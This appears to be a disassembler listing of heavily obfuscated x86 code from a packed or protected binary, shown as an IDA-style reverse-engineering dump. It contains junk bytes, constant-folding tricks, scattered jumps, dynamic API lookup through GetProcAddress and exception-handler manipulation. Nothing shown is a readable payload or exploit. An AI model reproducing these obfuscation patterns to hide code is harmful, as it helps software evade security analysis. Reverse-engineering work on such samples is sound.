; FUNCTION CHUNK AT 0048CBD2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048CBED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CC48 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048CC5B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048CCBA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CD94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE34 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0048CE82 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048CECF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048CEEB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048CF00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CF3D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048CF9A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048CFAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CFE4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048D006 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048D02F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048D15C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D1E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D1E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D1F7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048D244 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0048D291 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048D2AA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048D3CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D439 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D564 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D56A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D578 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048D5E5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048D630 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D649 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D656 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 0048D68D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D73B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D777 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D7E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D818 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D898 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D8A4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048D8D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048D94A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D952 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048D968 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048DA09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DACB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DAF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DB1F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048DB9C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DBA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DBB5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048DC74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DC96 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0048DCB5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DCBB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048DD57 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048DD66 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DD9D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DDA8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048DDC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DDF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DE35 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0048DE9A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048DEC7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DF0D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0048DF24 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048DF89 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048DFE2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048E00B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0048E074 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048E142 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E166 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0048E194 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0048E1E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E21B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048E25A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0048E33D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E477 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048E48A SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0048E4B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E5DE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048E662 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E676 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048E691 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E69F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048E732 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E796 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048E833 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048E85B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048E878 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0048E973 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048E998 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0048E99D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048EA27 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048EAD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EBCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048ECAE SIZE 00000005 BYTES

		xchg	esi, [esp-8+arg_4]
		pop	esi
		push	eax
		push	3C3E3DC1h
		pop	eax
		xor	eax, 3F9CCA40h
		or	eax, 0A6DBF88Ch
		jmp	loc_48BAE3
; ---------------------------------------------------------------------------
		align 2

loc_48A1B2:				; CODE XREF: sub_48A195:loc_48C6D0j
					; sub_48A195+3D08p
		xchg	ecx, [esp-8+arg_4]
		pop	ecx
		push	326C99Dh
		pop	ecx
		rol	ecx, 14h
		call	loc_48B0E8
		add	[edi], cl	; CODE XREF: sub_48A195:loc_48E662j
		test	[ebp+3Fh], esp
		jmp	loc_48DF0D
; ---------------------------------------------------------------------------
		db 2 dup(0), 58h
; ---------------------------------------------------------------------------
		and	eax, ecx
		jmp	loc_48DB9C
; ---------------------------------------------------------------------------
		align 4
		dd 17C0C100h, 9718E081h, 0C0C19E52h, 4DC08105h,	2CF6487Dh
		dd 3D4EE8h, 12A0E900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A1FA:				; CODE XREF: ss.cste0:00489E33j
		jmp	nullsub_536
; ---------------------------------------------------------------------------
		align 10h
		xchg	ecx, [esp-0Ch+arg_8]
		pop	ecx
		add	edi, 0DE0C307Fh
		mov	edi, [edi]
		xchg	edi, [esp-10h+arg_C]
		call	ds:dword_45D0BC	; GetProcAddress
		jmp	loc_48E4EE
; ---------------------------------------------------------------------------
		align 4

loc_48A21C:				; CODE XREF: sub_48A195:loc_48DFE2p
		xchg	esi, [esp-10h+arg_C]
		pop	esi
		mov	eax, [eax]
		pushf
		push	ebx
		push	0E29932C5h
		pop	ebx
		jmp	loc_48DDA2
; ---------------------------------------------------------------------------
		align 10h
		dd 0B1E9C300h, 3Bh, 487D70Bh, 0D5035824h, 0F909C281h, 0F5E98883h
					; CODE XREF: ss.cste0:loc_48DC3Bj
					; sub_48C70A+20A0j
		dd 28h
		db 0
; ---------------------------------------------------------------------------

loc_48A24D:				; DATA XREF: sub_48A195+1002o
		push	0FA49818Bh
		push	edx
		mov	edx, esi
		xchg	edx, [esp-4+arg_0]
		mov	esi, offset loc_48CE91
		jmp	loc_48DF89
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FDB80h, 0C7C19C00h,	0CAF78108h, 0E923845Eh,	3236h
		dd 10A1D181h, 0B5E9655Bh, 2, 0CB686800h, 0CCE90048h, 5
		dd 17A0840Fh, 0B8E90000h, 0B000015h, 241487D1h,	0A674685Ah
		dd 3EE90048h, 39h, 4ADB880Fh, 0CF230000h, 9D12CEC1h, 83E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A2BE:				; CODE XREF: sub_48E23D:loc_48E55Ej
		and	edi, 0D673D72Fh
		sub	edi, 0E539269h
		cmp	edi, 27A7BE4Dh
		jmp	loc_489BA6
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A2D7:				; DATA XREF: sub_48A195-1BBo
		push	edx
		push	offset byte_48EA7D
		jmp	loc_48C554
; ---------------------------------------------------------------------------
		dw 8100h
		dd 0ABADEEEAh, 3FE9E5h,	0C3000000h ; CODE XREF:	sub_48D83C+Ej
; ---------------------------------------------------------------------------

loc_48A2F0:				; CODE XREF: ss.cste0:00489FCDj
		jmp	nullsub_537
; ---------------------------------------------------------------------------

loc_48A2F5:				; DATA XREF: sub_48E438-4A07o
					; ss.cste0:loc_48BC1Eo
		call	sub_48CF06
		jmp	loc_48CF9A
; ---------------------------------------------------------------------------
		align 10h
		dd 2D06E900h, 1DE90000h, 32h, 1A84890Fh, 0E8C10000h, 1539E811h
		dd 0
; ---------------------------------------------------------------------------
		jmp	loc_48DC96
; ---------------------------------------------------------------------------

loc_48A321:				; CODE XREF: sub_48A195+571j
		jmp	loc_48D1F7
; ---------------------------------------------------------------------------

loc_48A326:				; CODE XREF: ss.cste0:00489920j
		jmp	loc_48B82A
; ---------------------------------------------------------------------------
		align 4
		dd 243C8700h, 243C875Fh, 0D0C015FFh, 75E80045h,	3Eh, 0F1BE1C1h
		dd 12AD82h, 0EAC10000h,	0E9DF8B05h, 0E37h, 3465850Fh, 45E90000h
		dd 87000036h, 8A582404h, 68992C00h, 48D2DAh, 2AA0E9h, 81DF1300h
		dd 0B00155C0h, 70F0810Eh, 3E4A4C3h, 1BC081C5h, 50086537h
		dd 487C68Bh, 2BBDE924h,	9F680000h, 3A07127h, 47D4E9EBh
		dd 81000000h, 0D735D4EFh, 41E7811Fh, 686FCF30h,	48A3E0h
		dd 0EFDE9h, 90EA8100h, 818A18D7h, 0FEBFE1C2h, 0A5A568C4h
		dd 0A9E90048h, 87000021h, 0E95E2434h, 78Bh, 0F4F6E959h
		dd 0E9C3FFFFh, 24D5h, 83F0C781h, 3C87FA39h, 2E02E924h
		dd 0
; ---------------------------------------------------------------------------
		jmp	loc_48C866
; ---------------------------------------------------------------------------
		jmp	loc_48AB21
; ---------------------------------------------------------------------------
		dw 19E8h
		dd 0FFFFF4h, 4114E9h, 0E8000000h, 2C23h, 5B241C87h, 0F026C181h
					; CODE XREF: sub_48E5AE+1Aj
					; sub_48D830+5j
		dd 0D0E81292h, 2Eh, 216FE900h, 0
; ---------------------------------------------------------------------------

locret_48A424:				; CODE XREF: ss.cste0:0048DA8Dj
		retn
; ---------------------------------------------------------------------------
		align 2
		jmp	loc_48E85B
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48C29C
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
; ---------------------------------------------------------------------------
		mov	ah, 44h
		mov	ebx, 5E0689E8h
		pushf
		push	offset loc_48BFB2
		jmp	loc_48B11F
; ---------------------------------------------------------------------------
		align 4
		dd 0CC38100h, 0E8C49114h, 37A5h, 40E90000h, 48h, 0D0C015FFh
		dd 33E90045h, 0FFFFFAh,	0BCAE9h, 34680000h, 0E90048D3h
		dd 2F7h, 0E9510000h, 1FDCh, 4DE80000h, 0E9000037h, 3AA5h
		dd 0FFF79CE9h, 0EEE900FFh, 0FFFFFDh, 0A0830F00h, 2B000002h
		dd 3868E9C6h, 0
; ---------------------------------------------------------------------------
		mov	esi, [ebp+0]
		xchg	esi, [esp+4+var_4]
		pop	esi
		push	ecx
		push	8BD26812h
		pop	ecx
		jmp	loc_48D1E9
; ---------------------------------------------------------------------------
		align 4
		pop	ebp
		retn	0Ch
; ---------------------------------------------------------------------------
		dd 64E90000h, 16h, 0B91E9h, 5C30000h, 48A4CEh, 0E8C300C6h
		dd 0DF3h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A4DE:				; CODE XREF: sub_48DD0E+9j
		jmp	loc_48AC5C
; ---------------------------------------------------------------------------
		xor	eax, 0AE72344Ch
		push	ebx
		pushf
		push	17524AB8h
		xchg	esi, [esp+0Ch+var_C]
		mov	ebx, esi
		jmp	loc_48E69F
; ---------------------------------------------------------------------------
		dw 0CB23h
		dd 0FAED890Fh, 0FE9FFFFh, 0C300003Bh, 78EB815Bh, 0E82E1236h
		dd 25F7h, 0AE4E900h, 0E9000000h, 12F6h,	2BC6890Fh, 39C0000h
		dd 304AE8F1h, 89000000h, 34A9E933h, 0
; ---------------------------------------------------------------------------
		xchg	ecx, [esp+0Ch+var_C]
		pop	ecx
		jmp	loc_48D656
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 299D84h, 1A800F00h, 0E900003Fh, 45F9h, 0C30000C3h, 0EA810000h
		dd 36FBCE41h, 69F6C881h, 496832BAh, 0E90048BEh,	151Ch
		dd 0D7DCEE81h, 0C6C1F6FAh, 0ADCE8117h, 0E8E031FCh, 0DBFh
		dd 82A9C381h, 0DD0304B8h, 74F3C381h, 389AB3Dh, 1DCEE8h
		dd 7DE90000h, 0E900002Ch, 25B4h, 0E98B5500h, 0B9242C87h
		dd 48B985h, 21D2E9h, 0D1810000h, 92BA01Fh, 20E5E9h, 0CFC3BE00h
		dd 51E90048h, 21h, 458B5F00h, 0D8E856FCh, 41h
		db 0
; ---------------------------------------------------------------------------

loc_48A5D9:				; CODE XREF: sub_48A195+139Bj
		xchg	edi, [esp+8+var_8]
		push	ecx
		push	0A2783B2Fh
		pop	ecx
		and	ecx, 76229411h
		sub	ecx, 78E99339h
		xor	ecx, 4CA4E36h
		sub	ecx, 0D9AAA39Eh
		jmp	loc_48BF81
; ---------------------------------------------------------------------------
		dd 14870000h, 0E68C324h, 0E90048EBh, 0FFFFF258h	; CODE XREF: sub_48E3F4+Aj
dword_48A610	dd 57008B5Fh, 4C0A689Ch, 815F2651h, 6359E0C7h, 3C7C1E9h
					; DATA XREF: sub_48A195+1C68o
		dd 0FFF865E9h, 0A43C00FFh, 11C3850Fh, 0B5E90000h, 3Fh
		dd 7CFCF081h, 0C5034B3Ah, 1FEAE8h, 666E900h, 8B530000h
		dd 241C87D8h, 0A8FD6856h, 7BE90048h, 9,	8B06C600h, 0EA8B555Eh
		dd 52242C87h, 48CE01BAh, 260DE900h, 0
; ---------------------------------------------------------------------------
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_48BD02
; ---------------------------------------------------------------------------
		push	ebx
		or	ebx, 0E765866Eh
		jmp	loc_48E833
; ---------------------------------------------------------------------------
		dd 1F830F00h, 9D000031h, 0CAEE9h
		db 0
; ---------------------------------------------------------------------------

loc_48A695:				; CODE XREF: sub_48A195:loc_48CCBAj
		mov	byte ptr [ebx],	87h
		pop	ebx
		mov	edi, ebp
; ---------------------------------------------------------------------------
byte_48A69B	db 0FFh			; DATA XREF: sub_48A195+29B9o
; ---------------------------------------------------------------------------
		cmp	al, 24h
		push	offset loc_48ACF0
		jmp	loc_48B966
; ---------------------------------------------------------------------------
		dd 0C0B95100h, 0E90048EAh, 1F71h, 41211168h, 0CE815E07h
		dd 0F994BFB3h, 335FC681h, 0CE812CBFh, 0EA32D2E5h, 0B45E681h
		dd 3DE96292h, 0F000023h, 29F584h, 243C8700h, 0BA098B5Fh
		dd 0F1F2F4F8h, 6AE9C0C6h
		db 0F1h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

locret_48A6EF:				; CODE XREF: sub_48A195+4897j
		retn
; ---------------------------------------------------------------------------

loc_48A6F0:				; CODE XREF: sub_48A195:loc_48DAF1j
		mov	byte ptr [edx],	8Bh
		pop	edx
		push	48A845h
		jmp	near ptr byte_489925+2
; ---------------------------------------------------------------------------

loc_48A6FE:				; CODE XREF: ss.cste0:0048E4CAj
		xchg	ebx, [esp+10h+var_10]
		pop	ebx
		xchg	ebx, [esp+0Ch+var_C]
		push	ebx
		jmp	loc_48A321
; ---------------------------------------------------------------------------
		db    0
; ---------------------------------------------------------------------------

loc_48A70C:				; CODE XREF: ss.cste0:0048BD54j
		xor	edi, 0EA6B339Ah
		add	ebx, edi
		call	loc_48E582
; ---------------------------------------------------------------------------
		db    0
		db    0
; ---------------------------------------------------------------------------

loc_48A71B:				; CODE XREF: sub_48A195+E6Fj
		jmp	loc_48B715
; ---------------------------------------------------------------------------
		dd 850F00h, 0E9000043h,	8E5h, 0C870000h, 1AC5924h, 3891E9C2h
		dd 87000000h, 685B241Ch, 48E992h, 37D6E9h, 68000000h, 0C6EE612Bh
		dd 8BCA815Ah, 8181509Ah, 0BCC1E4C2h, 949E958h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48A762:				; CODE XREF: sub_48A195:loc_48D94Aj
		retn
; ---------------------------------------------------------------------------
		push	2E81EECBh
		xor	ebx, ebp
		jmp	sub_48DE06
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A771:				; CODE XREF: ss.cste0:0048EC6Aj
		jmp	loc_48BA9F
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 0F00h, 90E90000h, 30h, 0A3C58100h, 0E9643F5Ch, 35Fh
		dd 2BC6815Eh, 8128530Dh, 0BD7372EEh, 27C6816Bh,	0E910E903h
		dd 3C6h, 94680000h, 0E90048AEh,	0FFFFF956h, 0E90000C3h
		dd 0FFFFF30Dh, 241C8700h, 2368575Bh, 0E9668711h, 0FFFFEFFBh
		dd 850F0000h, 1733h, 3792E958h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48A7DA:				; CODE XREF: sub_48A195+872j
		retn
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48B21D
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		db 0E8h
		dd 0FFFFF0ADh, 3798E900h, 0C0810000h, 0F36BFC5Eh, 48ADBD68h
		dd 0B3E900h, 0F000000h,	0DA185h, 27C9E900h, 0
; ---------------------------------------------------------------------------
		push	3A01AE8Ah
		pop	eax
		sub	eax, 588BF70Eh
		cmp	eax, 9764D5C5h
		jmp	loc_48CFAE
; ---------------------------------------------------------------------------
		db 0Bh
		dd 2759E9FEh, 0
; ---------------------------------------------------------------------------
		call	loc_48B6E8
		jmp	loc_489FD4
; ---------------------------------------------------------------------------
		dw 0E900h		; CODE XREF: sub_48A195+143Aj
		dd 96Dh, 90E90000h, 2Dh, 8703C600h, 0FB8B575Bh,	68243C87h
		dd 489A94h, 21DFE9h, 0C3000000h, 0A0E7BE56h, 78E90048h
		dd 57FFFFF8h, 99704768h, 0C7815FD0h, 0A52B20A2h, 8111C7C1h
		dd 75DBBAC7h, 1EBBE9DEh, 7890000h, 48C0F168h, 31DDE900h
		dd 0C3000000h, 0C0E90000h, 68FFFFFCh, 48E11Dh, 0FFFFF1E9h
		dd 0F0000FFh, 242080h, 1816E900h, 0C30000h, 0F3E8E900h
		dd 0FFFFh, 5BC703C6h, 55F26853h, 0E95BA5A3h, 0FFFFFF14h
; ---------------------------------------------------------------------------

locret_48A8C8:				; CODE XREF: ss.cste0:0048D1BDj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A8CB:				; CODE XREF: sub_48A195:loc_48B69Bj
		pop	ebp
		xor	edx, 0B499BDh
		add	edx, 0FCD3AD00h
		popf
		xor	eax, eax
		cld
		jmp	near ptr dword_489788+0D2h
; ---------------------------------------------------------------------------

loc_48A8E1:				; CODE XREF: sub_48D467+Ej
					; DATA XREF: ss.cste0:00489DDDo
		jz	loc_48C164
		push	esi
		push	0D660B9BBh
		pop	esi
		add	esi, 1BA64FA6h
		rol	esi, 7
		jmp	loc_48EBCA
; ---------------------------------------------------------------------------
		dd 9F656800h, 815EE5D5h, 5FCE5FE6h, 0D9FE819Bh,	0E953F754h
		dd 43F5h
; ---------------------------------------------------------------------------

loc_48A914:				; CODE XREF: ss.cste0:0048D1D1j
					; DATA XREF: sub_48E3C8+9o
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFF5F3E8h, 0F0000FFh, 0B8B82h, 24348700h, 241C875Eh
		dd 48E0BA68h, 11F0E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48A93F:				; DATA XREF: ss.cste0:00489FC8o
		push	0A56E4151h
		pop	esi
		sub	esi, 8E4281Bh
		xor	esi, 0E7BFF67Dh
		rol	esi, 1Fh
		sub	esi, 4946FAE2h
		jmp	loc_48E5DE
; ---------------------------------------------------------------------------
		align 10h

loc_48A960:				; CODE XREF: sub_48E325+6p
		xchg	eax, [esp+8+var_8]
		pop	eax
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_48DD66
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		db 0
; ---------------------------------------------------------------------------

loc_48A971:				; CODE XREF: sub_48CAE5+Aj
		push	offset word_48D556
		jmp	loc_48AEA5
; ---------------------------------------------------------------------------
		align 4
		dd 24A88D0Fh, 4870000h,	890F5824h, 0FFFFFA6Eh, 30058B64h
		dd 68000000h, 48E41Fh, 3A78E9h,	59000000h, 3289E8h, 29C88100h
		dd 0E98AD0DDh, 327Eh
		db 0
; ---------------------------------------------------------------------------

loc_48A9B1:				; CODE XREF: sub_48A195+CFAj
		jnz	loc_48AD5A
		add	cl, ch
		push	ebx
		sbb	[eax], eax
; ---------------------------------------------------------------------------
		dd 0D0330000h, 8B04EBC1h, 0E53E9FDh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A9CA:				; DATA XREF: sub_48A195:loc_48CC5Bo
		jz	locret_48AC4E
		push	offset word_48AA52
		jmp	locret_48AA4C
; ---------------------------------------------------------------------------
		add	edx, 0A9245F9Fh
		push	offset loc_48CFB5
		jmp	nullsub_554
; ---------------------------------------------------------------------------
		dw 0C300h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+18h+var_18]
		call	sub_48D127
		test	ebp, eax
		jmp	loc_48C6D0
; ---------------------------------------------------------------------------

loc_48A9FF:				; CODE XREF: sub_48A195:loc_48AFD8j
		push	ebx
		mov	ebx, esi
		push	offset loc_48D07A
		jmp	locret_48A7DA
; ---------------------------------------------------------------------------

loc_48AA0C:				; CODE XREF: sub_48D4FCp
		xchg	esi, [esp+20h+var_20]
		pop	esi
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+20h+var_20]
		jmp	near ptr dword_48A838+2Fh
; ---------------------------------------------------------------------------
		db    0
		db    0
; ---------------------------------------------------------------------------

loc_48AA1D:				; CODE XREF: ss.cste0:0048E9D2j
		mov	edi, 48C59Bh
		jmp	loc_48DD57
; ---------------------------------------------------------------------------
		db    0
		db 0B9h	; 
		db 0D4h	; 
		db 0B3h	; 
		db  70h	; p
		db  9Dh	; 
		db 0E9h	; 
		db 0CBh	; 
		db  14h
		db    0
		db    0
		db 0C3h	; 
		db    0
		db    0
		db 0E9h	; 
		db 0F1h	; 
		db  3Eh	; >
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		shr	edi, 8
		jmp	sub_489DC5
; ---------------------------------------------------------------------------
		dd 0E9C30000h, 3645h
; ---------------------------------------------------------------------------

locret_48AA4C:				; CODE XREF: sub_48A195+840j
		retn
; ---------------------------------------------------------------------------

loc_48AA4D:				; CODE XREF: sub_48A195+1DA7j
		jmp	loc_48CC48
; ---------------------------------------------------------------------------
word_48AA52	dw 0E768h		; DATA XREF: sub_48A195+83Bo
		dd 58046F67h, 3A43F081h, 0E8813260h, 879D2977h,	0FFF535E8h
		dd 0A3C281FFh, 87F014C4h, 39E92414h, 40h, 0B7685600h, 0E90048D6h
		dd 0A3h, 840F0000h, 3BF0h, 5DE58100h, 81BE56AEh, 870CC2C1h
		dd 0D6810F04h, 3000007h, 948C0FC5h, 0E9FFFFFAh,	3BD0h
; ---------------------------------------------------------------------------

loc_48AAAC:				; DATA XREF: sub_48CF06+10o
		push	offset loc_48BF95
		jmp	nullsub_556
; ---------------------------------------------------------------------------

loc_48AAB6:				; DATA XREF: sub_48C11D+18o
		cmp	edx, 0ADCB8032h
		jmp	loc_48B2AC
; ---------------------------------------------------------------------------
		db 0D1h, 0C6h, 0E9h
		dd 0FFFFF0ACh, 0CD685600h, 0E90048D8h, 26CFh, 0C207C600h
		dd 0E881585Fh, 0FCC4FCE5h, 0E5E0F081h, 0C503DAE8h, 699E9h
		dd 9C000000h, 5F243C87h, 87D68B52h, 0F2BE2414h,	0E90048E0h
		dd 175Ch, 0E9D0F700h, 0D5h, 0DDB8D0Fh, 91E90000h, 0FFFFF9h
		dd 0E900C300h, 1CEFh
		db 0
; ---------------------------------------------------------------------------

loc_48AB21:				; CODE XREF: sub_48A195+260j
		jmp	loc_48DF24
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 17E90000h, 0FFFFFFFh, 0FFF38384h, 0FD8100FFh, 9AEF77B5h
					; CODE XREF: sub_48E621+1B4j
					; ss.cste0:0048DD36j
		dd 0FFF36EE9h, 0F70000FFh, 0EE2ACAC2h, 0F67E9DAh, 0C2810000h
		dd 67C1FF28h, 0EB96BA52h, 10E90048h, 81000003h,	8F524BC2h
		dd 0F79CE923h, 0FFFFh, 4CE900C3h
; ---------------------------------------------------------------------------
		cmp	eax, [eax]

loc_48AB72:				; DATA XREF: sub_489DC5+8o
		add	[edx-75h], dl
		xlat
		xchg	edx, [esp-4+arg_0]
		call	sub_48DAFF

locret_48AB7E:				; CODE XREF: sub_48DB68+9j
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 9008B00h, 9984D9C0h,	64000033h, 58Fh, 0C4830000h, 158FE904h
		dd 890F0000h, 0FFFFF85Ah, 30058B64h, 0E9000000h, 0FFFFF770h
		dd 0E7C10000h, 0A0FD810Bh, 0E987C462h, 1084h, 58240487h
		dd 1DACE8h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48ABC7:				; CODE XREF: sub_48E4E6+725j
		call	near ptr dword_48A020+3Eh
		add	cl, ch
		add	cl, [edi]
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48ABD2:				; CODE XREF: sub_48C2E9+4D8j
		jmp	nullsub_552
; ---------------------------------------------------------------------------
		push	offset loc_48DD43
		jmp	nullsub_559
; ---------------------------------------------------------------------------
		xchg	esi, [esp+0]
		pop	esi
		mov	byte ptr [ebx],	87h
		xchg	ebp, [esp-4+arg_0]
		mov	ebx, ebp
		pop	ebp
		push	3C37222Ch
		xchg	esi, [esp-4+arg_0]
		jmp	loc_48B45E
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0F14h, 4C5E900h, 0
; ---------------------------------------------------------------------------
		add	eax, esi
		push	offset word_48BD86
		jmp	loc_489FB8
; ---------------------------------------------------------------------------
		dd 8507C600h, 0F2C2815Fh, 87BB4F42h, 0EDE92414h, 6400000Eh
					; CODE XREF: sub_48A195+3EE5j
		dd 30058Bh, 13E80000h, 0Eh, 80E9CB33h
		db 20h,	2 dup(0)
; ---------------------------------------------------------------------------

loc_48AC3F:				; CODE XREF: sub_48A195:loc_48B119j
		xchg	ebx, [esp+0]
		jmp	loc_48AFFE
; ---------------------------------------------------------------------------
		align 4
		dd 276EE900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48AC4E:				; CODE XREF: sub_48A195:loc_48A9CAj
		retn
; ---------------------------------------------------------------------------
		align 10h

loc_48AC50:				; CODE XREF: sub_48A195+2CFFj
		push	offset loc_48D14F
		jmp	loc_48B2E5
; ---------------------------------------------------------------------------
		align 4

loc_48AC5C:				; CODE XREF: sub_48A195:loc_48A4DEj
		push	offset loc_48AF15
		jmp	locret_48B176
; ---------------------------------------------------------------------------
		align 4
		dd 5FE9D73Bh, 55FFFFEDh, 2C87EE8Bh, 13A26824h, 14872595h
		dd 0E9F28B24h, 3C6Dh
		db 0
; ---------------------------------------------------------------------------

locret_48AC85:				; CODE XREF: sub_48A195:loc_48A143j
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 3257C781h, 21E833B4h, 2Ch, 17AE9h, 0F000000h, 3A586h
		dd 240C8700h, 0BE800F59h, 0E9000037h, 274Eh, 685100C3h
